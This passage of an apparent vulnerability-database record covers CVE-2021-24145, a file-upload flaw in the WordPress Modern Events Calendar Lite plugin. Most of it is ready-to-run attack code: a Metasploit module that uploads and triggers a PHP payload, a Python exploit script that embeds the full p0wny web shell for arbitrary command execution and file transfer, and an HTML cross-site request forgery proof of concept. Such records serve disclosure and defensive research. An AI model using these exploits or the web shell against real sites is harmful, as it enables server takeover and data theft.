]\n }\n )\n )\n\n register_options [\n OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),\n OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),\n OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])\n ]\n end\n\n def check\n unless wordpress_and_online?\n return CheckCode::Safe('Server not online or not detected as Wordpress')\n end\n\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n if cookie\n check_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5')\n else\n CheckCode::Detected('The admin credentials given are wrong !')\n end\n end\n\n def exploit\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n fail_with(Failure::NoAccess, 'Authentication failed') unless cookie\n payload_name = \"#{Rex::Text.rand_text_alpha_lower(5)}.php\"\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(payload.encoded, 'text/csv', nil, \"form-data; name='feed'; filename='#{payload_name}'\")\n post_data.add_part('import-start-bookings', nil, nil, \"form-data; name='mec-ix-action'\")\n\n print_status(\"Uploading file \\'#{payload_name}\\' containing the payload...\")\n\n r = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),\n 'headers' => {\n 'Origin' => full_uri('')\n },\n 'vars_get' => {\n 'page' => 'MEC-ix',\n 'tab' => 'MEC-import'\n },\n 'cookie' => cookie,\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n )\n\n fail_with(Failure::UnexpectedReply, \"Wasn't able to upload the payload file\") unless r&.code == 200\n register_file_for_cleanup(payload_name)\n\n print_status('Triggering the payload ...')\n send_request_cgi(\n 'method' => 'GET',\n 'headers' => {\n 'Origin' => full_uri('')\n },\n 'cookie' => cookie,\n 'uri' => normalize_uri(target_uri.path, \"/wp-content/uploads/#{payload_name}\")\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/36594", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:17:05", "description": "The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. The issue could also be exploited via a CRSF attack, as such check was also missing.\n\n### PoC\n\nhttps://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing Uploaded file will be at /wp-content/uploads/aa.php\n", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "wpvulndb", "title": "Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-02-01T06:02:35", "id": "WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610", "href": "https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-07-02T16:24:06", "description": "", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "packetstorm", "title": "WordPress Modern Events Calendar 5.16.2 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "PACKETSTORM:163346", "href": "https://packetstormsecurity.com/files/163346/WordPress-Modern-Events-Calendar-5.16.2-Shell-Upload.html", "sourceData": "`# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) \n# Date 01.07.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://webnus.net/modern-events-calendar/ \n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip \n# Version: Before 5.16.5 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2021-24145 \n# CWE: CWE-434 \n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md \n \n''' \nDescription: \nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, \ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' \ncontent-type in the request. \n''' \n \n \n''' \nBanner: \n''' \nbanner = \"\"\" \n______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \n/ ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | \n\\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \n \n* Wordpress Plugin Modern Events Calendar Lite RCE \n* @Hacker5preme \n \n \n\"\"\" \nprint(banner) \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nwp_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \nprint('') \n \n''' \nAuthentication: \n''' \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' \n \n# Header: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Body: \nbody = { \n'log': username, \n'pwd': password, \n'wp-submit': 'Log In', \n'testcookie': '1' \n} \n \n# Authenticate: \nprint('') \nauth = session.post(auth_url, headers=header, data=body) \nauth_header = auth.headers['Set-Cookie'] \nif 'wordpress_logged_in' in auth_header: \nprint('[+] Authentication successfull !') \nelse: \nprint('[-] Authentication failed !') \nexit() \n \n \n''' \nExploit: \n''' \nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\" \n \n# Exploit Header: \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell \nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n \n \n# Exploit \nsession.post(exploit_url, headers=header, data=body) \nprint('') \nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') \nprint('') \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163346/wpmec5162-shell.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-26T16:47:13", "description": "", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "packetstorm", "title": "WordPress Modern Events Calendar Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-26T00:00:00", "id": "PACKETSTORM:163672", "href": "https://packetstormsecurity.com/files/163672/WordPress-Modern-Events-Calendar-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution', \n'Description' => %q{ \nThis module allows an attacker with a privileged Wordpress account to launch a reverse shell \ndue to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5. \nThis is due to an incorrect check of the uploaded file extension. \nIndeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin. \nFinally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php` \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nguyen Van Khanh', # Original PoC and discovery \n'Ron Jost', # Exploit-db \n'Yann Castel (yann.castel[at]orange.com)' # Metasploit module \n], \n'References' => \n[ \n['EDB', '50115'], \n['CVE', '2021-24145'], \n['CWE', '434'] \n], \n'Platform' => [ 'php' ], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Wordpress Modern Events Calendar < 5.16.5', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => '2021-01-29', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options [ \nOptString.new('USERNAME', [true, 'Username of the admin account', 'admin']), \nOptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']), \nOptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']) \n] \nend \n \ndef check \nunless wordpress_and_online? \nreturn CheckCode::Safe('Server not online or not detected as Wordpress') \nend \n \ncookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) \nif cookie \ncheck_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5') \nelse \nCheckCode::Detected('The admin credentials given are wrong !') \nend \nend \n \ndef exploit \ncookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) \nfail_with(Failure::NoAccess, 'Authentication failed') unless cookie \npayload_name = \"#{Rex::Text.rand_text_alpha_lower(5)}.php\" \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(payload.encoded, 'text/csv', nil, \"form-data; name='feed'; filename='#{payload_name}'\") \npost_data.add_part('import-start-bookings', nil, nil, \"form-data; name='mec-ix-action'\") \n \nprint_status(\"Uploading file \\'#{payload_name}\\' containing the payload...\") \n \nr = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'), \n'headers' => { \n'Origin' => full_uri('') \n}, \n'vars_get' => { \n'page' => 'MEC-ix', \n'tab' => 'MEC-import' \n}, \n'cookie' => cookie, \n'data' => post_data.to_s, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n) \n \nfail_with(Failure::UnexpectedReply, \"Wasn't able to upload the payload file\") unless r&.code == 200 \nregister_file_for_cleanup(payload_name) \n \nprint_status('Triggering the payload ...') \nsend_request_cgi( \n'method' => 'GET', \n'headers' => { \n'Origin' => full_uri('') \n}, \n'cookie' => cookie, \n'uri' => normalize_uri(target_uri.path, \"/wp-content/uploads/#{payload_name}\") \n) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163672/wp_plugin_modern_events_calendar_rce.rb.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-02-15T22:17:05", "description": "The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. The issue could also be exploited via a CRSF attack, as such check was also missing.\n", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "wpexploit", "title": "Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-02-01T06:02:35", "id": "WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610", "href": "", "sourceData": "https://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing\r\n\r\n<html>\r\n <body onload=\"submitRequest();\">\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"https:\\/\\/example.com\\/wp-admin\\/admin.php?page=MEC-ix&tab=MEC-import\", true);\r\n xhr.setRequestHeader(\"Accept\", \"text\\/html,application\\/xhtml+xml,application\\/xml;q=0.9,image\\/webp,*\\/*;q=0.8\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-GB,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------132370916641787807752589698875\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------132370916641787807752589698875\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"aa.php\\\"\\r\\n\" + \r\n \"Content-Type: text/csv\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"\\x3c?php echo \\'FAILED\\'; ?\\x3e\\n\" + \r\n \"\\r\\n\" + \r\n \"-----------------------------132370916641787807752589698875\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"import-start-bookings\\r\\n\" + \r\n \"-----------------------------132370916641787807752589698875--\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n </body>\r\n</html>\r\n\r\n\r\nUploaded file will be at /wp-content/uploads/aa.php", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:54", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "exploitdb", "title": "Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24145", "CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "EDB-ID:50082", "href": "https://www.exploit-db.com/exploits/50082", "sourceData": "# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)\r\n# Date 01.07.2021\r\n# Exploit Author: Ron Jost (Hacker5preme)\r\n# Vendor Homepage: https://webnus.net/modern-events-calendar/\r\n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip\r\n# Version: Before 5.16.5\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2021-24145\r\n# CWE: CWE-434\r\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md\r\n\r\n'''\r\nDescription:\r\nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,\r\ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'\r\ncontent-type in the request.\r\n'''\r\n\r\n\r\n'''\r\nBanner:\r\n'''\r\nbanner = \"\"\"\r\n ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \r\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \r\n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \r\n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |\r\n \\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \r\n \r\n * Wordpress Plugin Modern Events Calendar Lite RCE \r\n * @Hacker5preme\r\n \r\n\r\n\"\"\"\r\nprint(banner)\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport requests\r\nimport argparse\r\n\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')\r\nmy_parser.add_argument('-T', '--IP', type=str)\r\nmy_parser.add_argument('-P', '--PORT', type=str)\r\nmy_parser.add_argument('-U', '--PATH', type=str)\r\nmy_parser.add_argument('-u', '--USERNAME', type=str)\r\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.IP\r\ntarget_port = args.PORT\r\nwp_path = args.PATH\r\nusername = args.USERNAME\r\npassword = args.PASSWORD\r\nprint('')\r\n\r\n'''\r\nAuthentication:\r\n'''\r\nsession = requests.Session()\r\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\r\n\r\n# Header:\r\nheader = {\r\n 'Host': target_ip,\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': 'http://' + target_ip,\r\n 'Connection': 'close',\r\n 'Upgrade-Insecure-Requests': '1'\r\n}\r\n\r\n# Body:\r\nbody = {\r\n 'log': username,\r\n 'pwd': password,\r\n 'wp-submit': 'Log In',\r\n 'testcookie': '1'\r\n}\r\n\r\n# Authenticate:\r\nprint('')\r\nauth = session.post(auth_url, headers=header, data=body)\r\nauth_header = auth.headers['Set-Cookie']\r\nif 'wordpress_logged_in' in auth_header:\r\n print('[+] Authentication successfull !')\r\nelse:\r\n print('[-] Authentication failed !')\r\n exit()\r\n\r\n\r\n'''\r\nExploit:\r\n'''\r\nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\"\r\n\r\n# Exploit Header:\r\nheader = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\",\r\n \"Origin\": \"http://\" + target_ip,\r\n \"Connection\": \"close\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n}\r\n\r\n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell\r\nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var 